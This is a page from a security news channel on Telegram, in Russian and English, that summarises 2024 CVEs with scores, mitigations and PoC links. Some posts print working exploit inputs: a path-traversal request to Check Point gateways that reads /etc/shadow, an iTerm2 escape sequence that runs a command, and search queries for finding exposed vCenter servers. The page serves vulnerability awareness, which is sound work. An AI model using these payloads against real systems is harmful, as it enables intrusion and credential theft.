SecuriXy.kz
3.37K subscribers
454 photos
18 videos
17 files
360 links
Все самое интересное из мира информ. безопасности и IT 👍🏻
Обсуждаем, делимся, умнеем
https://securixy.kz
Обратная связь - @feedback_securixy_bot
Хахатушки - @memekatz
Download Telegram
🔍 CVE ID: #CVE-2024-20767

Adobe #ColdFusion versions 2023.6, 2021.12 and earlier are affected by an Improper Access Control vulnerability that could lead to arbitrary file system read. An attacker could leverage this vulnerability to bypass security measures and gain unauthorized access to sensitive files and perform arbitrary file system write. Exploitation of this issue does not require user interaction.

Published: 2024-03-18
Base Score: 8.2
Base Severity: HIGH

PoC: https://tttttt.me/proxy_bar/1958
#CVE-2024-3400 OS Command Injection Vulnerability in GlobalProtect Gateway PAN-OS #PaloAlto

https://security.paloaltonetworks.com/CVE-2024-3400

IOC: https://unit42.paloaltonetworks.com/cve-2024-3400/
Check Point выпустила экстренное исправление для VPN нулевого дня, используемой в атаках #CVE-2024-24919 CVSS 3.X 7.5

https://vulmon.com/vulnerabilitydetails?qid=CVE-2024-24919

https://nvd.nist.gov/vuln/detail/CVE-2024-24919

https://www.bleepingcomputer.com/news/security/check-point-releases-emergency-fix-for-vpn-zero-day-exploited-in-attacks/

Check Point Remote Access VPN 0-Day
FOFA link
POC:

POST /clients/MyCRL HTTP/1.1
Host: <redacted>
Content-Length: 39

aCSHELL/../../../../../../../etc/shadow
cve_2024_30078_check.nasl
2.9 KB
#CVE-2024-30078 Windows #WiFi Driver #RCE

Windows Wi-Fi Driver Remote Code Execution Vulnerability

Новая уязвимость Wi-Fi подвергает риску всех пользователей Windows - исправляйте как можно скорее!

- неавторизованный RCE, затрагивающий драйверы Wi-Fi всех версий Windows, означает, что любой злоумышленник в радиусе действия Wi-Fi может скомпрометировать ваше устройство.

Published: 2024-06-11
Base Score: 8.8
Base Severity: HIGH
Vector String: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Ресурсы:
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-30078

https://www.forbes.com/sites/daveywinder/2024/06/14/new-wi-fi-takeover-attack-all-windows-users-warned-to-update-now/

Плагин для Nessus прилагается (функционал плагина не соотвествует уязвимости, проверяем).
Forwarded from APT
🔥 VMware vCenter Server RCE + PrivEsc

Multiple heap-overflow vulnerabilities in the implementation of the DCE/RPC protocol. They could allow a bad actor with network access to vCenter Server to achieve remote code execution by sending a specially crafted network packet.

CVE-2024-37079: A heap-overflow vulnerability in the DCERPC protocol implementation of vCenter Server that allows a malicious actor with network access to send specially crafted packets, potentially leading to remote code execution. (CVSS v3.1 score: 9.8 "critical");

CVE-2024-37080: Another heap overflow vulnerability in the DCERPC protocol of vCenter Server. Similar to CVE-2024-37079, it allows an attacker with network access to exploit heap overflow by sending crafted packets, potentially resulting in remote code execution. (CVSS v3.1 score: 9.8 "critical");

CVE-2024-37081: This vulnerability arises from a misconfiguration of sudo in vCenter Server, permitting an authenticated local user to exploit this flaw to elevate their privileges to root on the vCenter Server Appliance. (CVSS v3.1 score: 7.8 "high").

Nuclei Template (PoC):
🔗 https://gist.github.com/tothi/0ff034b254aca527c3a1283ff854592a

Shodan
product:"VMware vCenter Server"

FOFA
app="vmware-vCenter"


#vmware #vcenter #rce #lpe #cve
Forwarded from APT
🖼️ RegreSSHion — OpenSSH Unauthenticated RCE

The Qualys Threat Research Unit has discovered a Remote Unauthenticated Code Execution vulnerability in OpenSSH’s server (sshd) in glibc-based Linux systems. CVE assigned to this vulnerability is CVE-2024-6387.

The vulnerability, which is a signal handler race condition in OpenSSH’s server (sshd), allows unauthenticated remote code execution (RCE) as root on glibc-based Linux systems.

🔗 Research:
https://blog.qualys.com/vulnerabilities-threat-research/2024/07/01/regresshion-remote-unauthenticated-code-execution-vulnerability-in-openssh-server

🔗 PoC:
https://github.com/7etsuo/cve-2024-6387-poc

#openssh #glibc #rce #cve
Please open Telegram to view this post
VIEW IN TELEGRAM
SecuriXy.kz
🖼️ RegreSSHion — OpenSSH Unauthenticated RCE The Qualys Threat Research Unit has discovered a Remote Unauthenticated Code Execution vulnerability in OpenSSH’s server (sshd) in glibc-based Linux systems. CVE assigned to this vulnerability is CVE-2024-6387.…
Onother one #CVE-2024-6409: Affects the privilege separation child process with limited privileges, which affects OpenSSH in versions 8.7 and 8.8.

Состояние гонки в функции grace_alarm_handler() создает возможность удаленного выполнения кода в дочернем процессе privsep. Новая уязвимость имеет меньшее непосредственное влияние, но по-прежнему представляет собой значительный риск для безопасности.‍

Patch Now: ‍
В /etc/ssh/sshd_config‍, задайте:

LoginGraceTime 0


Ребутните sshd
systemctl restart sshd


Этот костыль эффективен для устранения обеих уязвимостей CVE-2024-6387 и CVE-2024-6409...
Forwarded from APT
Please open Telegram to view this post
VIEW IN TELEGRAM
#CVE-2024-21007 Weblogic Server RCE & #CVE-2024-21006 unauthorized access to critical data

├ Published: 2024-04-16
├ Base Score: 7.5 (HIGH)
├ Affected Versions: 12.2.1.4.0, 14.1.1.0.0

https://www.oracle.com/security-alerts/cpuapr2024.html

https://securityboulevard.com/2024/04/weblogic-t3-iiop-information-disclosure-vulnerability-cve-2024-21006-cve-2024-21007/?utm_source=dlvr.it&utm_medium=twitter
This media is not supported in your browser
VIEW IN TELEGRAM
PoC: #CVE-2024-38396 & #CVE-2024-38395 for iTerm2 arbitrary command execution

Вы можете выполнять произвольные команды, просто управляя данными, выводимыми в консоль. Вводимые в консоль команды работают в обновленной на текущий момент версии Build 3.5.3.


]2;s&open -aCalculator&[21t P1000p%session-changed s
#CVE-2024-22274: Privilege Escalation: #VMware #vCenter Server Authenticated #RCE

https://github.com/l0n3m4n/CVE-2024-22274-RCE
Apache Superset - CVE-2024-34693.pdf
2.2 MB
#CVE-2024-34693 Apache Superset Arbitrary File Read Vulnerability

Затронутые версии:
Apache Superset до версии 3.1.3; Apache Superset 4.0.0 до версии 4.0.1

Описание: Уязвимость Improper Input Validation в Apache Superset позволяет аутентифицированному злоумышленнику создать соединение MariaDB с включенным local_infile. Если и сервер MariaDB (по умолчанию выключен), и локальный клиент mysql на веб-сервере настроены на разрешение local infile, злоумышленник может выполнить определенную SQL-команду MySQL/MariaDB, способную читать файлы с сервера и вставлять их содержимое в таблицу базы данных MariaDB. Пользователям рекомендуется обновиться до версии 4.0.1 или 3.1.3, в которых проблема устранена.

Nuclei template: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/exposed-panels/superset-login.yaml
Исследователи Fortinet FortiGuard Labs https://www.fortinet.com/blog/threat-research/exploiting-cve-2024-21412-stealer-campaign-unleashed кампанию, нацеленную на Испанию, Таиланд и США с использованием уязвимости CVE-2024-21412 (оценка CVSS: 8,1).

Исправленная уязвимость безопасности в Microsoft Defender SmartScreen использовалась для распространения вредоносных программ таких как ACR Stealer, Lumma и Meduza.

Уязвимость высокой степени серьезности позволяет злоумышленнику обойти защиту SmartScreen и доставить вредоносные вредоносные нагрузки. Microsoft устранила ее еще в феврале 2024 года.

В ходе наблюдаемых атак злоумышленники заманивают жертву, заставляя ее пройти по созданной ссылке на URL-файл, предназначенный для загрузки LNK-файла. Затем LNK-файл загружает исполняемый файл, содержащий скрипт (HTML-приложения). Файл HTA служит каналом для декодирования и расшифровки кода PowerShell, отвечающего за извлечение поддельного PDF-файла и инжектора шелл-кода.

Он, в свою очередь, приводит к развертыванию Meduza Stealer или Hijack Loader, которые впоследствии запускают CR Stealer или Lumma.

Полезные forensics artifacts для #CVE_2024_21412 : .url файлы в WebDAV папке для детекта:


C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV\*.url
Снова Apache #OFBiz ERP #RCE #CVE-2024-38856

Коренная причина уязвимости кроется в недостатках механизма аутентификации

CVSS score of 9.8 / 10.0.

Она затрагивает Apache OFBiz все версии до 18.12.15.

https://thehackernews.com/2024/08/new-zero-day-flaw-in-apache-ofbiz-erp.html

Big thanks Aman for news
#Kibana 8.14.2 / 7.17.23 arbitrary code execution via prototype pollution (ESA-2024-22)

Эта проблема затрагивает экземпляры Kibana, запущенные на Elastic Cloud, но RCE ограничено внутри контейнера Kibana Docker. Дальнейшая эксплуатация, например выход из контейнера, предотвращается с помощью seccomp-bpf и профилей AppArmor.

Affected Versions:
Kibana 8.x < versions prior to 8.14.2 and Kibana 7.x < versions prior to 7.17.23

Solutions and Mitigations:
Users should upgrade to version 8.14.2 and 7.17.23.

Severity: CVSSv3: 9.9(Critical) - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H 108

CVE ID: #CVE-2024-37287

https://discuss.elastic.co/t/kibana-8-14-2-7-17-23-security-update-esa-2024-22/364424
#Roundcube #CVE-2024-42009 и #CVE-2024-42008 - обе ошибки XSS. Первая позволяет удаленному злоумышленнику украсть и отправить электронную почту жертвы через поддельное сообщение, вторая - через вредоносное вложение.

Severity: еще не выдана оценка

Третяя #CVE-2024-42010 - позволяет использовать недостаточно отфильтрованные последовательности маркеров Cascading Style Sheets (CSS) в отрисованных почтовых сообщениях, что позволяет удаленному злоумышленнику получить конфиденциальную информацию.

Severity: High 7.5/ 10

https://github.com/roundcube/roundcubemail/releases

Кто юзает обновляйтесь
Снова Jenkins

#CVE-2024-43044 | #CVE-2024-43045 Critical Jenkins Vulnerability Exposes Servers to RCE Attacks

Jenkins 2.470, LTS 2.452.3 и более ранние версии позволяют процессам агента читать произвольные файлы из файловой системы контроллера Jenkins с помощью метода `ClassLoaderProxy#fetchJar` в библиотеке Remoting.

CVSS Score : 9.1

Обновите до версии LTS 2.452.3 и 2.470 и выше

https://www.jenkins.io/security/advisory/2024-08-07/

https://github.com/advisories/GHSA-h856-ffvv-xvr4
#CVE-2024-22116 Critical RCE в Zabbix Monitoring Solution

An administrator with restricted permissions can exploit the lack of default escaping for script parameters.

CVSS 9.9

The vulnerability affects the following versions of Zabbix:
6.4.0 to 6.4.15
7.0.0alpha1 to 7.0.0rc2

Zabbix has addressed this issue in the following fixed versions:
6.4.16rc1
7.0.0rc3

https://support.zabbix.com/browse/ZBX-25016
Критическая уязвимость TCP/IP #CVE-2024-38063 от 13 августа 2024 обзавелась первым PoC'ом. Пусть это и приводит к крашу ipv6 через flask питона, но уже есть над чем работать.

Форкнул себе на всякий случай
https://github.com/cleverg0d/CVE-2024-38063-POC